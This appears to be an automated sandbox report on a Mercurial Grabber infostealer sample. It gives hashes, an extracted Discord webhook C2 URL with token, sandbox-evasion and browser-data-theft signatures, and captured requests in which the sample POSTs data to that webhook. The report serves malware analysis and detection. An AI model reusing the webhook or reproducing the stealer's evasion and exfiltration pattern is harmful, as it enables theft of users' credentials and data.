Analysis

  • max time kernel
    148s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20240226-en locale:en-us os:windows10-2004-x64 system
  • submitted
    28/03/2024, 20:17 UTC

General

  • Target

    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe

  • Size

    41KB

  • MD5

    0f243aa3dcd8c33124e3fa9d3d12c343

  • SHA1

    7ae66af8676fc184ae800a5c6f46ce3943655fa1

  • SHA256

    f514711a78d01f9701310ae3ef72d7dcd78518a4ef355079349c6d3ce7d1cf39

  • SHA512

    eee55390d27109d434f92e3f4c719a30920f0d843ceb36eedde29744fdfbe5e4c97472901da626f9d5d4ea8a5f6405e54ddb32bc6e70f4dfbc023786addc0606

  • SSDEEP

    768:0scG4ApfT6ahzpDXswIuZkeNWTj0KZKfgm3Ehkl:bcKfnhz8eNWTIF7EWl

Malware Config

Extracted

Family

mercurialgrabber

C2

https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS

Signatures

  • Mercurial Grabber Stealer

    Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.

  • Looks for VirtualBox Guest Additions in registry (2 TTPs, 1 IoCs)
  • Looks for VMWare Tools registry key (2 TTPs, 1 IoCs)
  • Checks BIOS information in registry (2 TTPs, 1 IoCs)

    BIOS information is often read in order to detect sandboxing environments.

  • Reads user/profile data of web browsers (2 TTPs)

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
  • Looks up external IP address via web service (3 IoCs)

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry (3 TTPs, 2 IoCs)

    Disk information is often read in order to detect sandboxing environments.

  • Checks SCSI registry key(s) (3 TTPs, 1 IoCs)

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry (2 TTPs, 2 IoCs)

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry (2 TTPs, 4 IoCs)
  • Modifies system certificate store (2 TTPs, 5 IoCs)
  • Suspicious use of AdjustPrivilegeToken (1 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe"
    1⤵
    • Looks for VirtualBox Guest Additions in registry
    • Looks for VMWare Tools registry key
    • Checks BIOS information in registry
    • Maps connected drives based on registry
    • Checks SCSI registry key(s)
    • Checks processor information in registry
    • Enumerates system info in registry
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    PID:4428

Network

  • flag-us
    DNS
    217.106.137.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    217.106.137.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    ip4.seeip.org
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    ip4.seeip.org
    IN A
    Response
    ip4.seeip.org
    IN A
    23.128.64.141
  • flag-us
    DNS
    0.205.248.87.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.205.248.87.in-addr.arpa
    IN PTR
    Response
    0.205.248.87.in-addr.arpa
    IN PTR
    https-87-248-205-0lgwllnwnet
  • flag-us
    DNS
    2.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    2.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    ip-api.com
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    ip-api.com
    IN A
    Response
    ip-api.com
    IN A
    208.95.112.1
  • flag-us
    GET
    http://ip-api.com//json/
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    Remote address:
    208.95.112.1:80
    Request
    GET //json/ HTTP/1.1
    Host: ip-api.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Thu, 28 Mar 2024 20:17:37 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 302
    Access-Control-Allow-Origin: *
    X-Ttl: 60
    X-Rl: 44
  • flag-us
    DNS
    discord.com
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    discord.com
    IN A
    Response
    discord.com
    IN A
    162.159.138.232
    discord.com
    IN A
    162.159.137.232
    discord.com
    IN A
    162.159.128.233
    discord.com
    IN A
    162.159.136.232
    discord.com
    IN A
    162.159.135.232
  • flag-us
    POST
    https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    Remote address:
    162.159.138.232:443
    Request
    POST /api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS HTTP/1.1
    Content-Type: application/json
    Host: discord.com
    Content-Length: 441
    Expect: 100-continue
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 28 Mar 2024 20:17:38 GMT
    Content-Type: application/json
    Content-Length: 45
    Connection: keep-alive
    set-cookie: __dcfduid=38e5f398ed4011ee8dd39ac2721eb6c2; Expires=Tue, 27-Mar-2029 20:17:38 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1711657059
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OF5XydyMv6Y504vZm%2BJKoItq37JWmCTRmiNcHlbwXqeSjstv1EWqRgvzdzlZOBN%2FokzqjCy%2FT9DitfEq5pOPPXS5NJkRKti8j4h7AlekbyKU0oVNthDo7nPOo3nI"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=38e5f398ed4011ee8dd39ac2721eb6c252286f1585bfa7cf621658610747c447b4c79b418a2a8f54faca6698b99dc7eb; Expires=Tue, 27-Mar-2029 20:17:38 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=0b90a9d0d585da427664ed71b7e2f56a60c5e8c5-1711657058; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=w8BQdbUXIs17JFGXM3TBWffDWfz_jIuRQqhHKG_P7_Q-1711657058388-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 86ba4e061f3694b1-LHR
  • flag-us
    POST
    https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    Remote address:
    162.159.138.232:443
    Request
    POST /api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS HTTP/1.1
    Content-Type: application/json
    Host: discord.com
    Content-Length: 315
    Expect: 100-continue
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 28 Mar 2024 20:17:38 GMT
    Content-Type: application/json
    Content-Length: 45
    Connection: keep-alive
    set-cookie: __dcfduid=39019a76ed4011eebf71f2b9a0a04292; Expires=Tue, 27-Mar-2029 20:17:38 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 3
    x-ratelimit-reset: 1711657060
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wSWzGRVRMuJx3PGR8RjiUmtWzjqGypyx5VsaL7Rilgq%2F5K%2FnCageu0%2Fd47F4RuZ0y86zC3Ok5QOwAYBVHPTM9o%2F8ElTggr55Zdd5YHEpiVU89Xn5mfzlvUuMJbQn"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=39019a76ed4011eebf71f2b9a0a042922bfb1ed3e0a9af21abd5f7839c130de5962f0fd545f996955982115d2e37b378; Expires=Tue, 27-Mar-2029 20:17:38 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=0b90a9d0d585da427664ed71b7e2f56a60c5e8c5-1711657058; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=W21S.rKJiQCyyWtmFZTLTKaYocjeb5DZHTEOqglwdDg-1711657058564-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 86ba4e07391694b1-LHR
  • flag-us
    POST
    https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    Remote address:
    162.159.138.232:443
    Request
    POST /api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS HTTP/1.1
    Content-Type: application/json
    Host: discord.com
    Content-Length: 745
    Expect: 100-continue
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 28 Mar 2024 20:17:39 GMT
    Content-Type: application/json
    Content-Length: 45
    Connection: keep-alive
    set-cookie: __dcfduid=39682c78ed4011ee82bc1e4bfad1ce74; Expires=Tue, 27-Mar-2029 20:17:39 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 4
    x-ratelimit-reset: 1711657060
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W8vdyizVb8pqcYZ4qm8563sO%2B3lJsGPELMJ6NcPNOHTZw0HJmOhNd6kBzyyu7PFpuVzYTtSQojlGxj5verhtq9RPX7KwlB43amPNiBb677VZCteT0%2BtexkKw%2BVHw"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=39682c78ed4011ee82bc1e4bfad1ce74ffddf152476fb8aec78b887916f9cd91bcf035e713f4e180e79d4726c012ba4b; Expires=Tue, 27-Mar-2029 20:17:39 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=bec68b89d56816841f41de6decf9bec5b689d633-1711657059; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=KJHNInhHwiMTsYCiv4rF9_Qs9zTWtx13CkHhFMrAesQ-1711657059236-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 86ba4e0acd8b94b1-LHR
  • flag-us
    POST
    https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    Remote address:
    162.159.138.232:443
    Request
    POST /api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS HTTP/1.1
    Content-Type: multipart/form-data; boundary=----------e1bc0d13e8c946b48657b2be3059e73d
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:42.0) Gecko/20100101 Firefox/42.0
    Host: discord.com
    Content-Length: 662
    Expect: 100-continue
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 28 Mar 2024 20:17:39 GMT
    Content-Type: application/json
    Content-Length: 45
    Connection: keep-alive
    set-cookie: __dcfduid=39afcccced4011eeaaf1a6d52251bd1b; Expires=Tue, 27-Mar-2029 20:17:39 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 3
    x-ratelimit-reset: 1711657061
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=shzJZp1Bc61otyaWUGk2XzRwDLWqOoXP3tK2cWqEDz2HtPSY7pBmHmuzjBGpkAu3oVAvAGOLxaaxLYCQY7MzgXUw6z34%2Fy8cF%2FOhhYVSbiqBjno1O%2BU175v0yTpc"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=39afcccced4011eeaaf1a6d52251bd1be31d75cedd1bf31123e7eebe2673ab8d15a8043ab8a142b94f3a5bf3d5158957; Expires=Tue, 27-Mar-2029 20:17:39 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=065162e3738cb4cc3aef21e298aca63710313d67-1711657059; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=KHgQ_I7PmYT1bLaXKUBxKKKrFzxpFW6cG6Fj80GzmVk-1711657059705-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 86ba4e0e2aa194b1-LHR
  • flag-us
    DNS
    141.64.128.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    141.64.128.23.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    1.112.95.208.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    1.112.95.208.in-addr.arpa
    IN PTR
    Response
    1.112.95.208.in-addr.arpa
    IN PTR
    ip-apicom
  • flag-us
    DNS
    232.138.159.162.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    232.138.159.162.in-addr.arpa
    IN PTR
    Response
  • flag-us
    POST
    https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    Remote address:
    162.159.138.232:443
    Request
    POST /api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: discord.com
    Content-Length: 196
    Expect: 100-continue
    Response
    HTTP/1.1 404 Not Found
    Date: Thu, 28 Mar 2024 20:17:39 GMT
    Content-Type: application/json
    Content-Length: 45
    Connection: keep-alive
    set-cookie: __dcfduid=398bc26eed4011ee81f2da06b9926043; Expires=Tue, 27-Mar-2029 20:17:39 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
    x-ratelimit-limit: 5
    x-ratelimit-remaining: 3
    x-ratelimit-reset: 1711657060
    x-ratelimit-reset-after: 1
    via: 1.1 google
    alt-svc: h3=":443"; ma=86400
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xRuZfaumJlt2wB3cMfc%2FDa26axrKvT2WJMElLw%2FKEtZOR9olQOfXz2JDU9PRk5FpCX5sBnlUhc%2FTKjO26wgiTziAs3VEFHQTeDyyWIX4iuG6RoWoje8vP3V0%2FiC5"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    X-Content-Type-Options: nosniff
    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
    Set-Cookie: __sdcfduid=398bc26eed4011ee81f2da06b99260438f51fbb062bbdb713f960e0bf39472ffc69e9a28b0314b8a1566c703f0beba78; Expires=Tue, 27-Mar-2029 20:17:39 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
    Set-Cookie: __cfruid=bec68b89d56816841f41de6decf9bec5b689d633-1711657059; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Set-Cookie: _cfuvid=VxN29yt3aKP_QcoFEMQbSj20vYAOaIvFRporr9CrRYs-1711657059467-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
    Server: cloudflare
    CF-RAY: 86ba4e0cbca0654b-LHR
  • flag-us
    DNS
    97.17.167.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    97.17.167.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    103.169.127.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    103.169.127.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    15.164.165.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    15.164.165.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    8.11.19.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.11.19.2.in-addr.arpa
    IN PTR
    Response
    8.11.19.2.in-addr.arpa
    IN PTR
    a2-19-11-8deploystaticakamaitechnologiescom
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    27.73.42.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    27.73.42.20.in-addr.arpa
    IN PTR
    Response
  • 23.128.64.141:443
    ip4.seeip.org
    tls
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    826 B
    5.0kB
    12
    9
  • 208.95.112.1:80
    http://ip-api.com//json/
    http
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    296 B
    611 B
    5
    3

    HTTP Request

    GET http://ip-api.com//json/

    HTTP Response

    200
  • 162.159.138.232:443
    https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS
    tls, http
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    4.6kB
    10.8kB
    21
    28

    HTTP Request

    POST https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS

    HTTP Response

    404

    HTTP Request

    POST https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS

    HTTP Response

    404

    HTTP Request

    POST https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS

    HTTP Response

    404

    HTTP Request

    POST https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS

    HTTP Response

    404
  • 162.159.138.232:443
    https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS
    tls, http
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    1.3kB
    2.2kB
    8
    9

    HTTP Request

    POST https://discord.com/api/webhooks/897139619336966215/JnDh4Q-lR3UDGzcnqgYR7VieyLoWfMVkVYrFGteFEdlA3kcMpCdb5ozh-U8qJs12EkbS

    HTTP Response

    404
  • 8.8.8.8:53
    217.106.137.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    217.106.137.52.in-addr.arpa

  • 8.8.8.8:53
    ip4.seeip.org
    dns
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    59 B
    75 B
    1
    1

    DNS Request

    ip4.seeip.org

    DNS Response

    23.128.64.141

  • 8.8.8.8:53
    0.205.248.87.in-addr.arpa
    dns
    71 B
    116 B
    1
    1

    DNS Request

    0.205.248.87.in-addr.arpa

  • 8.8.8.8:53
    2.159.190.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    2.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    ip-api.com
    dns
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    56 B
    72 B
    1
    1

    DNS Request

    ip-api.com

    DNS Response

    208.95.112.1

  • 8.8.8.8:53
    discord.com
    dns
    0f243aa3dcd8c33124e3fa9d3d12c343_JaffaCakes118.exe
    57 B
    137 B
    1
    1

    DNS Request

    discord.com

    DNS Response

    162.159.138.232
    162.159.137.232
    162.159.128.233
    162.159.136.232
    162.159.135.232

  • 8.8.8.8:53
    141.64.128.23.in-addr.arpa
    dns
    72 B
    140 B
    1
    1

    DNS Request

    141.64.128.23.in-addr.arpa

  • 8.8.8.8:53
    1.112.95.208.in-addr.arpa
    dns
    71 B
    95 B
    1
    1

    DNS Request

    1.112.95.208.in-addr.arpa

  • 8.8.8.8:53
    232.138.159.162.in-addr.arpa
    dns
    74 B
    136 B
    1
    1

    DNS Request

    232.138.159.162.in-addr.arpa

  • 8.8.8.8:53
    97.17.167.52.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    97.17.167.52.in-addr.arpa

  • 8.8.8.8:53
    103.169.127.40.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    103.169.127.40.in-addr.arpa

  • 8.8.8.8:53
    15.164.165.52.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    15.164.165.52.in-addr.arpa

  • 8.8.8.8:53
    8.11.19.2.in-addr.arpa
    dns
    68 B
    129 B
    1
    1

    DNS Request

    8.11.19.2.in-addr.arpa

  • 8.8.8.8:53
    11.227.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    11.227.111.52.in-addr.arpa

  • 8.8.8.8:53
    27.73.42.20.in-addr.arpa
    dns
    70 B
    156 B
    1
    1

    DNS Request

    27.73.42.20.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • memory/4428-0-0x0000000000C40000-0x0000000000C50000-memory.dmp

    Filesize

    64KB

  • memory/4428-1-0x00007FFB81160000-0x00007FFB81C21000-memory.dmp

    Filesize

    10.8MB

  • memory/4428-2-0x0000000002F50000-0x0000000002F60000-memory.dmp

    Filesize

    64KB

  • memory/4428-8-0x00007FFB81160000-0x00007FFB81C21000-memory.dmp

    Filesize

    10.8MB